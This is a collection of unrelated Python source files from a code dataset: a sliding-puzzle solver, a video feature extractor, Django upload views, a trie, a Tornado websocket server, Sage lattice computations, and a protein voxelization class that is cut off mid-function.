puzzlebox.scaley\n self.movecount = 0\n self.moves = []\n self.tileresults = []\n\n self.puzzlebox = puzzlebox\n self.tilepositions = self.gettilepositions()\n self.template_images = templates.PUZZLE_PIECES[puzzle.overlay.selectedPuzzle]\n\n def gettilepositions(self):\n positions = []\n for y in range(0, 5):\n pointy = self.first_posy_scaled + (self.tile_height_scaled * y) + (y * self.tile_gapvert_scaled)\n for x in range(0, 5):\n pointx = self.first_posx_scaled + (self.tile_width_scaled * x) + (x * self.tile_gaphorz_scaled)\n positions.append([pointx, pointy])\n return positions\n\n def gettileimages(self, puzzlebox):\n tileimages = []\n for position in self.tilepositions:\n tileimage = puzzlebox.puzzleimage[position[1]:position[1] + self.tile_width_scaled,\n position[0]:position[0] + self.tile_height_scaled]\n tileimages.append(tileimage)\n return tileimages\n\n @staticmethod\n def get_key(item):\n return item[0]\n\n def match_tiles(self):\n results = [-1 for _ in range(25)]\n likeliness = [-1 for _ in range(25)]\n correlation_values = [[] for _ in range(25)]\n tile_images = self.gettileimages(self.puzzlebox)\n for x, tile in enumerate(tile_images):\n for i, template_tile in enumerate(self.template_images):\n resized_template = resize(template_tile, (tile.shape[1], tile.shape[0]))\n result = matchTemplate(tile, resized_template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n correlation_values[x].append([maxval, i])\n correlation_values[x].sort(key=self.get_key, reverse=True)\n results[x] = correlation_values[x][0][1]\n likeliness[x] = correlation_values[x][0][0]\n return results, likeliness, correlation_values\n\n def findzerotile(self):\n correlation_values = []\n tile_images = self.gettileimages(self.puzzlebox)\n for x, tile in enumerate(tile_images):\n resized_template = resize(self.template_images[0], (tile.shape[1], tile.shape[0]))\n result = matchTemplate(tile, resized_template, TM_CCORR_NORMED)\n (_, maxval, _, maxloc) = minMaxLoc(result)\n correlation_values.append([maxval, x])\n correlation_values.sort(key=self.get_key, reverse=True)\n return correlation_values[0][1]\n\n @staticmethod\n def rematch_tiles(shiftcorr, shiftamounts, correlation_values):\n results = [-1 for _ in range(25)]\n likeliness = [-1 for _ in range(25)]\n for item in shiftcorr:\n results[item[0]] = correlation_values[item[0]][shiftamounts[item[0]]][1]\n likeliness[item[0]] = correlation_values[item[0]][shiftamounts[item[0]]][0]\n return results, likeliness\n\n @staticmethod\n def find_rechecks(checkarray, correlation_values):\n duplicates = [[i, item] for i, item in enumerate(checkarray) if checkarray.count(item) > 1]\n for x, item in enumerate(duplicates):\n bettermatch = item\n for y, secitem in enumerate(duplicates):\n if item == secitem:\n if correlation_values[y] > correlation_values[x]:\n bettermatch = secitem\n duplicates.remove(bettermatch)\n return duplicates\n\n def gettileresults(self):\n recheck_count = [0 for _ in range(25)]\n results, likeliness, correlation_values = self.match_tiles()\n rechecks = self.find_rechecks(results, likeliness)\n loopcount = 0\n while len(rechecks) > 0:\n loopcount += 1\n if loopcount >= 400: # never going to solve\n break\n for item in rechecks:\n recheck_count[item[0]] += 1\n if recheck_count[item[0]] >= 25:\n recheck_count[item[0]] = 0\n\n newresults, newlikeliness = self.rematch_tiles(rechecks, recheck_count, correlation_values)\n for x, item in enumerate(newresults):\n if item is not -1:\n results[x] = newresults[x]\n likeliness[x] = 
newlikeliness[x]  # bugfix: use the re-matched confidence; the original line self-assigned 
likeliness[x]\n rechecks = self.find_rechecks(results, likeliness)\n return results\n\n def createmovelist(self):\n t = self.gettileresults()\n self.moves, self.tileresults = npuzzle.main(t)\n self.movecount = len(self.moves)\n\n def getmovelocation(self, steps):\n if len(self.moves) == 0:\n self.createmovelist()\n self.updatemoves()\n tilepositions = []\n for step in steps:\n if self.movecount >= step + 1:\n x = self.tileresults.index(self.moves[step]) % 5\n y = int((self.tileresults.index(self.moves[step]) / 5))\n tilepos = [self.first_posx_scaled + (self.tile_width_scaled * x) + (x * self.tile_gaphorz_scaled) +\n self.puzzlebox.puzzlerect['posx'],\n self.first_posy_scaled + (self.tile_height_scaled * y) + (y * self.tile_gapvert_scaled) +\n self.puzzlebox.puzzlerect['posy']-6]\n tilepositions.append(tilepos)\n else:\n tilepositions.append(None)\n return tilepositions\n\n def updatemoves(self):\n zerotile = self.findzerotile()\n if self.tileresults.index(0) is not zerotile:\n if zerotile in self.getadjacent(self.tileresults.index(0)):\n self.tileresults[self.tileresults.index(0)] = self.tileresults[zerotile]\n self.tileresults[zerotile] = 0\n t = self.tileresults\n self.moves, self.tileresults = npuzzle.main(t)\n self.movecount = len(self.moves)\n\n @staticmethod\n def getadjacent(index):\n if index >= 5: # up\n yield index - 5\n if index % 5 > 0: # right\n yield index - 1\n if index % 5 is not 4: # left\n yield index + 1\n if index < 20: # down\n yield index + 5\n yield index\n","sub_path":"puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"223687265","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport sonnet as snt\n\nfrom PIL import Image, ImageOps\nimport cv2\n\nimport numpy as np\n\nimport os\n\nimport i3d\n\nimport sys\n\ninp1 = sys.argv[1]\ninp2 = sys.argv[2]\n\n# In[2]:\n\n\n# Proprecessing for image(scale and crop)\ndef reshape_img_pil(img):\n width, height = np.array(img).shape[0:2]\n min_ = min(height, width)\n ratio = float(256/float(min_))\n new_w = int(ratio*width)\n new_h = int(ratio*height)\n \n img_resize = np.array(img.resize((new_w, new_h), resample=Image.BILINEAR))\n img_scale = (img_resize/255.0)*2-1\n new_img = img_scale[int((new_h-224)/2):int((new_h+224)/2),int((new_w-224)/2):int((new_w+224)/2),:]\n \n return new_img\n\ndef reshape_cv2(img, type):\n width, height = img.shape[0:2]\n min_ = min(height, width)\n ratio = float(256/float(min_))\n new_w = int(ratio*width)\n new_h = int(ratio*height)\n# print(width, height, new_w, new_h)\n# print((new_h-224)/2, (new_h+224)/2, (new_w-224)/2, (new_w+224)/2)\n if type=='rgb':\n frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n else:\n frame = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (new_w,new_h), interpolation=cv2.INTER_LINEAR)\n frame = (frame/255.0)*2-1\n frame = frame[int((new_h-224)/2):int((new_h+224)/2),int((new_w-224)/2):int((new_w+224)/2)]\n \n return frame\n\n\n# In[3]:\n\n\ndef get_batch(idx, step, video_path, video_name, type):\n raw_images = []\n for i in range(step):\n if type == 'rgb':\n image_name = 'img_%05d.jpg'%(idx+1+i)\n if os.path.exists(os.path.join(video_path, image_name)):\n img = cv2.imread(os.path.join(video_path, image_name))\n img = reshape_cv2(img, type='rgb')\n raw_images.append(img)\n elif type == 'flow':\n flow_x_name = 'flow_x_%05d.jpg'%(idx+1+i)\n flow_y_name = 'flow_y_%05d.jpg'%(idx+1+i)\n if 
os.path.exists(os.path.join(video_path, flow_x_name)):\n flow_x_img = cv2.imread(os.path.join(video_path, flow_x_name))\n flow_y_img = cv2.imread(os.path.join(video_path, flow_y_name))\n \n flow_x_img = reshape_cv2(flow_x_img, type='flow')\n flow_y_img = reshape_cv2(flow_y_img, type='flow')\n \n# print(flow_x_img.shape, flow_y_img.shape)\n# flow = np.stack((flow_x_img, flow_y_img))\n# print(flow.shape)\n flow = np.stack((flow_x_img, flow_y_img)).reshape(224,224,2)\n\n raw_images.append(flow)\n \n return np.array(raw_images)\n\n\n# In[13]:\n\n\nimage_size = 224\nnum_class = 20\n\nsample_path = {\n 'rgb': 'data/v_CricketShot_g04_c01_rgb.npy',\n 'flow': 'data/v_CricketShot_g04_c01_flow.npy',\n}\n\ncheckpoints = {\n 'rgb_scratch': 'data/checkpoints/rgb_scratch/model.ckpt',\n 'flow_scratch': 'data/checkpoints/flow_scratch/model.ckpt',\n 'rgb_imagenet': 'data/checkpoints/rgb_imagenet/model.ckpt',\n 'flow_imagenet': 'data/checkpoints/flow_imagenet/model.ckpt',\n}\n\nraw_path = {\n 'val': '/data/th14_raw/val_optical_flow_rgb',\n 'test': '/data/th14_raw/test_optical_flow_rgb',\n}\n\nsave_paths = {\n 'val_imagenet': '/data/th14_feature_i3d/feat_and_var/feat_imagenet/val_feat',\n 'test_imagenet': '/data/th14_feature_i3d/feat_and_var/feat_imagenet/test_feat',\n 'val_scratch': '/data/th14_feature_i3d/feat_and_var/feat_scratch/val_feat',\n 'test_scratch': '/data/th14_feature_i3d/feat_and_var/feat_scratch/test_feat',\n}\n\n\n# In[4]:\n\n\nrgb_input = tf.placeholder(tf.float32, shape=(1,None,image_size,image_size,3))\nflow_input = tf.placeholder(tf.float32, shape=(1,None,image_size,image_size,2))\nwith tf.variable_scope('RGB'):\n rgb_model = i3d.InceptionI3d(num_class+1, spatial_squeeze=True, final_endpoint='Mixed_5c')\n rgb_mixed5c, _ = rgb_model(rgb_input, is_training=False, dropout_keep_prob=1.0)\n# rgb_feat = tf.nn.avg_pool3d(rgb_mixed5c, ksize=[1, 2, 7, 7, 1],\n# strides=[1, 1, 1, 1, 1], padding=snt.VALID)\n rgb_feat = rgb_mixed5c\n\nrgb_variable_map = {}\nfor variable in tf.global_variables():\n if variable.name.split('/')[0] == 'RGB':\n rgb_variable_map[variable.name.replace(':0', '')] = variable\nrgb_saver = tf.train.Saver(var_list=rgb_variable_map, reshape=True)\n \nwith tf.variable_scope('Flow'):\n flow_model = i3d.InceptionI3d(num_class+1,spatial_squeeze=True, final_endpoint='Mixed_5c')\n flow_mixed5c, _ = flow_model(flow_input, is_training=False, dropout_keep_prob=1.0)\n# flow_feat = tf.nn.avg_pool3d(flow_mixed5c, ksize=[1, 2, 7, 7, 1],\n# strides=[1, 1, 1, 1, 1], padding=snt.VALID)\n flow_feat = flow_mixed5c\n \nflow_variable_map = {}\nfor variable in tf.global_variables():\n if variable.name.split('/')[0] == 'Flow':\n flow_variable_map[variable.name.replace(':0', '')] = variable\nflow_saver = tf.train.Saver(var_list=flow_variable_map, reshape=True)\n\n\n# In[9]:\n\n\ndef get_mean_var(feat):\n feat = np.reshape(feat, (-1, 1024))\n mean = np.mean(feat, axis=0)\n var = np.var(feat, axis=0)\n feat_all = np.hstack((mean, var))\n return feat_all\n\n\n# In[18]:\n\n\ndef extract_feat(feat_extractor='imagenet', data_source='test'):\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2) # 30% memory of TITAN is enough\n# self.sess = tf.Session(config = tf.ConfigProto(gpu_options=gpu_options)) \n with tf.Session(config = tf.ConfigProto(gpu_options=gpu_options)) as sess:\n feed_dict = {}\n \n rgb_feat_type = 'rgb' + '_' + feat_extractor\n flow_feat_type = 'flow' + '_' + feat_extractor\n \n rgb_saver.restore(sess, checkpoints[rgb_feat_type])\n flow_saver.restore(sess, 
checkpoints[flow_feat_type])\n# rgb_saver.restore(sess, checkpoints['rgb'])\n# flow_saver.restore(sess, checkpoints['flow'])\n \n tf.logging.info('RGB checkpoint restored')\n tf.logging.info('Flow checkpoint restored')\n \n feat_path = raw_path[data_source]\n \n save_pn = data_source + '_' + feat_extractor\n save_path = save_paths[save_pn]\n\n feat_step = 16\n\n video_list = os.listdir(feat_path)\n# print(len(video_list))\n for video in video_list:\n# video = 'video_test_0001292'\n \n video_path = os.path.join(feat_path, video)\n# if not os.path.exists(video_path):\n# os.makedirs(video_path)\n print(video_path)\n num_frames = len(os.listdir(video_path))/3\n index = np.arange(num_frames-8, step=8)\n# print(len(index))\n for idx in index:\n rgb_batch = get_batch(idx, feat_step, video_path, video, type='rgb')\n flow_batch = get_batch(idx, feat_step, video_path, video, type='flow')\n\n rgb_arr = rgb_batch[np.newaxis, :]\n# rgb_arr = (rgb_arr/255.0)*2-1\n flow_arr = flow_batch[np.newaxis, :]\n# flow_arr = (flow_arr/255.0)*2-1\n\n feed_dict[rgb_input] = rgb_arr\n feed_dict[flow_input] = flow_arr\n\n rgb, flow = sess.run([rgb_feat, flow_feat], feed_dict=feed_dict)\n# print(rgb.shape, flow.shape)\n rgb = get_mean_var(rgb)\n flow = get_mean_var(flow)\n print(rgb.shape, flow.shape)\n save_name = video+'.mp4_'+str(float(idx+1))+'_'+str(float(str(idx+1+feat_step)))+'.npy'\n print(save_path,save_name)\n np.save(os.path.join(save_path, 'rgb', save_name), rgb)\n np.save(os.path.join(save_path, 'flow', save_name), flow)\n \n# break\n \n\n\n# In[19]:\n\n\nextract_feat(feat_extractor=inp1, data_source=inp2)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"feat_extractor(2019.7.25)/extract_feature_7.25.py","file_name":"extract_feature_7.25.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597746738","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom photologue.models import *\nfrom django.shortcuts import render_to_response\nfrom django.conf import settings\nimport os\nfrom PIL import Image\nimport datetime\nfrom .models import Text\nfrom .models import PhotoTextMap\n\ndef upload(request):\n return render(request,'example1/upload.html')\n\ndef allupload(request):\n try:\n f=request.FILES['xinwentuxiang']\n if f.size > 5000000:\n return HttpResponse(\"it is large!\")\n try:\n parser=ImageFile.Parser()\n for chunk in f.chunks():\n parser.feed(chunk)\n img=parser.close()\n except IOError:\n return HttpResponse(\"it is an io error!\")\n imageName='photologue/photos/'+f.name\n name=settings.STATIC_PATH+'/'+imageName\n \n img=Image.open(f)\n img.save(name) \n\n except UnicodeEncodeError:\n return render_to_response('example1/upload.html',{'image_error':\"please use English\"})\n\n now ='00TB'+datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n photoInfo=Photo(image=imageName,title=now,slug=now,is_public=True)\n photoInfo.save()\n\n phototype=\"0000\" \n \n\n try:\n f1=request.FILES['fengmiantuxiang']\n if f1.size > 5000000:\n return HttpResponse(\"it is large!\")\n try:\n parser1=ImageFile.Parser()\n for chunk1 in f1.chunks():\n parser1.feed(chunk1)\n img1=parser1.close()\n except IOError:\n return HttpResponse(\"it is an io error!\")\n imageName1='photologue/photos/'+f1.name\n name1=settings.STATIC_PATH+'/'+imageName1\n \n img1=Image.open(f1)\n img1.save(name1) \n except UnicodeEncodeError:\n return render_to_response('example1/upload.html',{'image_error':\"please use 
English\"})\n\n now1 ='11TB'+datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n photoInfo1=Photo(image=imageName1,title=now1,slug=now1,is_public=True)\n photoInfo1.save()\n\n phototype1=\"0001\" \n\n title=request.POST['xinwenwenbenkuang']\n content=request.POST['xinwenwenbenyu']\n name=request.POST['tuxiangwenbenkuang']\n tt=Text()\n tt.text_title=title\n tt.text_content=content\n tt.photo_name=name\n tt.save() \n\n pe=PhotoTextMap()\n pe.PhotoTextMap_texttitle=title\n pe.PhotoTextMap_phototype=phototype\n pe.PhotoTextMap_phototitle=now\n pe.save()\n\n pe1=PhotoTextMap()\n pe1.PhotoTextMap_texttitle=title\n pe1.PhotoTextMap_phototype=phototype1\n pe1.PhotoTextMap_phototitle=now1\n pe1.save() \n\n return HttpResponse(\"it is ok!\") \n\ndef showall(request):\n photo_list= Photo.objects.all()\n text_list=Text.objects.all()\n phototextmap_list=PhotoTextMap.objects.all()\n return render_to_response('example1/showall.html',{'photo_list':photo_list,'text_list':text_list,'phototextmap_list':phototextmap_list})\n\ndef showmore(request,phototextmapPhotoTextMap_phototitle):\n m=phototextmapPhotoTextMap_phototitle\n pp=PhotoTextMap.objects.get(PhotoTextMap_phototitle=m)\n p=pp.PhotoTextMap_texttitle\n t=Text.objects.get(text_title=p)\n photo_list= Photo.objects.all()\n phototextmap_list=PhotoTextMap.objects.all()\n return render_to_response('example1/showmore.html',{'photo_list':photo_list,'phototextmap_list':phototextmap_list,'t':t})\n","sub_path":"gongzuo/example001/example1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"321593267","text":"import time\nimport sys\nn=2520\nb=False\nfor i in range(20,sys.maxsize):\n\tif b==False:\n\t\tfor j in range(2,21):\n\t\t\tif not i%j==0:\n\t\t\t\tbreak\n\t\t\telif j==20:\n\t\t\t\tprint(i)\n\t\t\t\tb=True\n\t\t\t\tbreak\n\telse:\n\t\tbreak\n\n\nprint(time.process_time())\nprint(\" seconds\")\n","sub_path":"euler5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"572071967","text":"import os\nimport sys\nimport tornado.httpserver as httpserv\nimport tornado.websocket as ws\nimport tornado.ioloop as ilop\nimport tornado.web as tw\n\nfrom django.conf import settings\nfrom getaran.data import bacalah\n\nCHECKER = 'Date'\nSTART_LINE = 15\n\n\nclass WSHandler(ws.WebSocketHandler):\n def __init__(self, *args, **kwargs):\n self.cb = ilop.PeriodicCallback(self.send_data, 10000)\n super(WSHandler, self).__init__(*args, **kwargs)\n\n def data_received(self, chunk):\n pass\n\n def check_origin(self, origin):\n return True\n\n def open(self):\n print('Websocket terhubung dengan:', self.request.headers['Origin'])\n self.cb.start()\n\n def send_data(self):\n dt = {}\n files = [x for x in os.listdir(PATH) if x.endswith('.txt')]\n for file in files:\n d_file = os.path.join(PATH, file)\n with open(d_file, 'r') as f:\n first_line = f.readline()\n\n if CHECKER in first_line:\n with open(d_file, 'r') as fs:\n lines = fs.readlines()\n\n with open(d_file, 'w') as fw:\n fw.writelines(lines[START_LINE:])\n df = bacalah.baca(d_file, kondisi='index')\n\n dt[file[1:-4]] = {\n 'depan': {\n 'x': [float(file[1:-4].split('_')[1])] * df['frekuensi'].count().compute(),\n 'y': df['frekuensi'].compute().tolist(),\n 'z': df['ampl_front'].compute().tolist()\n },\n 'belakang': {\n 'x': [float(file[1:-4].split('_')[1])] * 
df['frekuensi'].count().compute(),\n 'y': list(df['frekuensi'].compute()),\n 'z': list(df['ampl_rear'].compute())\n }\n }\n\n self.write_message(dt)\n\n def on_message(self, message):\n pass\n\n def on_close(self):\n print('Websocket ditutup dari:', self.request.headers['Origin'])\n self.cb.stop()\n\napplication = tw.Application([\n (r'/', WSHandler),\n])\n\nif __name__ == \"__main__\":\n sys.path.append('/home/kiya/Documents/Development/freq')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'freq.settings')\n PATH = settings.LOKASI_DATA\n\n http_server = httpserv.HTTPServer(application)\n http_server.listen(5678)\n ilop.IOLoop.instance().start()\n","sub_path":"getaran/data/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"567964698","text":"# -*- coding: utf-8 -*-\nfrom flask import render_template, redirect, request, url_for, flash, current_app\nfrom flask.ext.login import login_user, logout_user, login_required, \\\n current_user\nfrom .. import db\nfrom ..models import Comment\nfrom . import comment\nfrom .forms import CommentForm\nfrom datetime import datetime\n\n@comment.route('/delete_comment/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef delete_comment(id):\n comment = Comment.query.filter_by(id=id).first_or_404()\n tid, turl = ( comment.topic.id, 'topic.show_topic') if comment.topic else \\\n (comment.note.id, 'note.show_note')\n\n db.session.delete(comment)\n db.session.commit()\n return redirect(url_for(turl, id=tid))\n\n \n@comment.route('/edit_comment/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef edit_comment(id):\n comment = Comment.query.filter_by(id=id).first_or_404()\n form = CommentForm()\n\n if form.validate_on_submit():\n comment.contents = form.body.data\n comment.lastupdate_timestamp = datetime.utcnow()\n db.session.add(comment)\n db.session.commit()\n if comment.topic:\n return redirect(url_for('topic.show_topic', id=comment.topic.id))\n else:\n return redirect(url_for('note.show_note', id=comment.note.id)) \n form.body.data = comment.contents\n return render_template(\"comment/edit_comment.html\", form=form)\n \n","sub_path":"NoteBook/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"419149935","text":"'''\nA trie (pronounced as \"try\") or prefix tree is a tree data structure used to efficiently store and retrieve keys in a dataset of strings. 
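(Note, added for clarity: each operation walks at most one node per character, so insert, search and startsWith all run in O(L) time for a key of length L, independent of how many keys are stored.) 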
There are various applications of this data structure, such as autocomplete and spellchecker.\nImplement the Trie class:\nTrie() Initializes the trie object.\nvoid insert(String word) Inserts the string word into the trie.\nboolean search(String word) Returns true if the string word is in the trie (i.e., was inserted before), and false otherwise.\nboolean startsWith(String prefix) Returns true if there is a previously inserted string word that has the prefix prefix, and false otherwise.\n\nExample 1:\nInput\n[\"Trie\", \"insert\", \"search\", \"search\", \"startsWith\", \"insert\", \"search\"]\n[[], [\"apple\"], [\"apple\"], [\"app\"], [\"app\"], [\"app\"], [\"app\"]]\nOutput\n[null, null, true, false, true, null, true]\n\nExplanation\nTrie trie = new Trie();\ntrie.insert(\"apple\");\ntrie.search(\"apple\"); // return True\ntrie.search(\"app\"); // return False\ntrie.startsWith(\"app\"); // return True\ntrie.insert(\"app\");\ntrie.search(\"app\"); // return True\n\nUsed as spell checker, autocomplete, IP routing, T9 predictive text, word games\n'''\n\n\"\"\"\nTrie representation in form of nested dictionary:\n\n{ 'b': { 'a': { 'l': { 'l': { '$': True}},\n 't': { '$': True}}},\n 'd': { 'o': { '$': True,\n 'l': { 'l': { '$': True}},\n 'r': { 'k': { '$': True},\n 'm': { '$': True}}}},\n 's': { 'e': { 'n': { 'd': { '$': True},\n 's': { 'e': { '$': True}}}}}}\n\"\"\"\n\nclass Trie:\n def __init__(self):\n \"\"\"\n Initialize your data structure here\n \"\"\"\n self.root = {}\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie\n \"\"\"\n start = self.root\n for i in word:\n if i not in start:\n # This is not a prefix for any word that has been added\n # Initialize an empty dictionary for every letter of the word added\n # Letters of the word are mapped to each other as nested dictionary values\n start[i] = {}\n\n start = start[i] # points to last letter of the word inserted\n\n start['$'] = True # marks the end of word\n\n def search(self, word:str) -> bool:\n \"\"\"\n returns True if word is in Trie\n \"\"\"\n start = self.root\n for i in word:\n if i not in start:\n return False\n start = start[i]\n return '$' in start\n\n def startsWith(self, prefix:str) -> bool:\n \"\"\"\n Returns True if any word has given prefix\n \"\"\"\n start = self.root\n for i in prefix:\n if i not in start:\n return False\n start = start[i]\n return True\n\n\n\n\n# Your Trie object will be instantiated and called as such:\ntrie = Trie()\ntrie.insert(\"apple\")\nprint(trie.search(\"apple\")) # True\nprint(trie.search(\"app\")) # False\nprint(trie.startsWith(\"app\")) # True\ntrie.insert(\"app\")\nprint(trie.search(\"app\")) # True\n","sub_path":"Leetcode questions and answers/Trie_Implement_Prefix_Trie.py","file_name":"Trie_Implement_Prefix_Trie.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541539136","text":"from sage.all import *\nfrom phi_computation import *\nfrom lattice_package import *\nimport sys\nimport time\nimport json\nimport datetime\nimport logging\n\nM = GLattice.dade(4,9)\nG = M.group\ni = G.sylow_subgroup()\nM = M.restriction(i)\nG = i.domain_group\n\nlog = []\n\nprint(Phi(M))\n\nsys.exit()\n\nx0, x1, x2 = G.get_gens()\nv1, v2, v3, v4 = M._get_basis_elements_list()\np = M.orbit_cover([v2, v3])\nassert p.is_coflasque(verbose=False)\nN_original = p.kernel_map().domain\n\nsys.exit()\n\nbig_groups_generators = [subgroup_gens for subgroup_gens in G.conjugate_subgroups()\n if 
len(G.subgroup(subgroup_gens).domain_group.get_elements())>4]\n\ncounter=1\nfor subgroup_gens in reversed(big_groups_generators):\n i_H = G.subgroup(subgroup_gens)\n N = N_original.restriction(i_H)\n H = i_H.domain_group\n start = time.time()\n result = Phi(N)\n end = time.time()\n log.append({ 'subgroup H': str(subgroup_gens),\n '#H': str(len(H.get_elements())),\n 'rank of Phi(H, N)': str(result['Phi']),\n 'rank of H1(H, Gamma^2(N)/2)': str(result['H1(H, Gamma^2(N)/2)']),\n 'rank of H1(H, Lambda^2(N)/2)': str(result['H1(H, Lambda^2(N)/2)']),\n 'rank of im(H1(H, Gamma^2(N)/2) -> H1(H, Lambda^2(N)/2)': \\\n str(result['im(H1(H, Gamma^2(N)/2) -> H1(H, Lambda^2(N)/2)']),\n 'rank of im(H1(H, Lambda^2(N)) -> H1(H, Lambda^2(N)/2)': \\\n str(result['im(H1(H, Lambda^2(N)) -> H1(H, Lambda^2(N)/2)']),\n 'computed in': str(end-start)\n })\n print(str(subgroup_gens)+' done '+str(counter)+' out of '+str(len(big_groups_generators)))\n counter+=1\n\nwith open('4dDade9.txt', 'w') as outfile:\n json.dump(log, outfile)\n","sub_path":"4d case/4dcaseDade9.py","file_name":"4dcaseDade9.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"384753033","text":"# coding -*- utf-8 -*-\n\nfrom tksheet import Sheet\nimport tkinter as tk\nfrom student import *\nfrom student_adapter import *\nfrom db_adapter import *\n\nclass demo(tk.Tk):\n def __init__(s, db):\n tk.Tk.__init__(s)\n s.db = db\n \n s.grid_columnconfigure(0,weight=1)\n s.grid_rowconfigure(0,weight=1)\n s.frame = tk.Frame(s)\n s.addBtn = tk.Button(s.frame, text=u'добавить')\n s.addBtn.grid(row=0,column=0,sticky='nswe')\n s.addBtn.config(command = s.click_event)\n s.frame.grid_rowconfigure(0, weight=1)\n s.frame.grid_columnconfigure(0, weight=1)\n s.sheet = Sheet(s.frame,\n page_up_down_select_row = True,\n column_width = 130,\n data = [student_adapter(student,db) for student in db.get_student()]\n )\n s.sheet.enable_bindings((\"single_select\",\n 'edit_cell'))\n\n s.frame.grid(row=0,column=0, sticky = 'nswe')\n s.sheet.grid(row=1,column=0, sticky = 'nswe')\n \n def click_event(s):\n '''\n Add new empty student record\n '''\n s.sheet.insert_row(values=student_adapter(student(),s.db), redraw=True)\n\ndef main():\n mydb = db()\n app = demo(mydb)\n app.mainloop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tkinter_view.py","file_name":"tkinter_view.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"84246498","text":"from collections import defaultdict\n\nimport numpy as np\nfrom scipy import spatial\nimport numpy.lib.recfunctions\n\nfrom molmimic.common.DistributedStructure import DistributedStructure\nfrom molmimic.common.ProteinTables import vdw_aa_radii\nfrom molmimic.common.features import default_atom_features, default_residue_features\n\nclass DistributedVoxelizedStructure(DistributedStructure):\n def __init__(self, path, key, cath_domain_dataset, coarse_grained=False, file_mode=\"r\",\n volume=264, voxel_size=1.0, rotate=None, use_features=None, predict_features=None,\n replace_na=False, ligand=False):\n super().__init__(path, key, cath_domain_dataset, coarse_grained=coarse_grained,\n file_mode=file_mode)\n\n self.mean_coord = np.zeros(3)\n self.mean_coord_updated = False\n\n self.volume = volume\n self.voxel_size = voxel_size\n self.voxel_tree = None\n self.atom_tree = None\n\n self.use_features = use_features if use_features is not None else 
self.feature_names\n self.predict_features = predict_features\n\n if self.predict_features is not None and use_features is not None:\n assert len(set(self.predict_features).intersection(set(self.use_features)))==0, \\\n \"Cannot train on and predict the same features\"\n\n self.replace_na = replace_na\n\n self.ligand = ligand\n\n if rotate is None or (isinstance(rotate, bool) and not rotate):\n self.shift_coords_to_volume_center()\n self.set_voxel_size(self.voxel_size)\n elif isinstance(rotate, str) and rotate == \"pai\":\n self.orient_to_pai()\n self.shift_coords_to_volume_center()\n self.set_voxel_size(self.voxel_size)\n elif (isinstance(rotate, str) and rotate == \"random\") or (isinstance(rotate, bool) and rotate):\n next(self.rotate())\n elif isinstance(rotate, np.ndarray):\n next(self.rotate(rotate))\n else:\n raise RuntimeError(\"Invalid rotation option. Must be None or False for no rotation, 'pai' to orient to principal axis, 'random' for a random rotation matrix, or an actual rotation matrix\")\n\n def create_full_volume(self, input_shape=(96, 96, 96)):\n truth_grid = np.zeros(list(input_shape)+[1])\n for atom in self.get_atoms():\n for grid in self.get_vdw_grid_coords_for_atom(atom[\"X\", \"Y\", \"Z\"]):\n truth_grid[grid[0], grid[1], grid[2], 0] = 1\n return truth_grid\n\n def shift_coords_to_volume_center(self):\n return self.shift_coords(np.array([self.volume/2]*3))\n\n def resize_volume(self, new_volume, shift=True):\n self.volume = new_volume\n if shift:\n self.shift_coords_to_volume_center()\n\n def rotate(self, rvs=None, num=1, return_to=None):\n if return_to is None:\n return_to=[self.volume/2]*3\n for r in super().rotate(rvs=rvs, num=num, return_to=return_to):\n self.set_voxel_size(self.voxel_size)\n yield r\n\n def orient_to_pai(self, random_flip=False, flip_axis=(0.2, 0.2, 0.2)):\n super().orient_to_pai(random_flip=random_flip, flip_axis=flip_axis)\n self.shift_coords_to_volume_center()\n\n def get_features_per_atom(self, residue_list):\n \"\"\"Get features for each atom, but not organized in grid\"\"\"\n return self.data[self.data[:,\"residue_id\"].isin(residue_list)]\n\n def get_features(self, residue_list=None, only_surface=False, autoencoder=False):\n if self.coarse_grained:\n return self.map_residues_to_voxel_space(\n truth_residues=residue_list,\n only_surface=only_surface,\n autoencoder=autoencoder)\n return self.map_atoms_to_voxel_space(\n truth_residues=residue_list,\n only_surface=only_surface,\n autoencoder=autoencoder)\n\n def map_atoms_to_voxel_space(self, truth_residues=None,\n only_surface=False, autoencoder=False, return_voxel_map=False,\n return_serial=False, return_b=False, nClasses=2, simple_fft=None,\n verbose=False, use_raw_atom_coords=False):\n \"\"\"Map atoms to sparse voxel space.\n\n Parameters\n 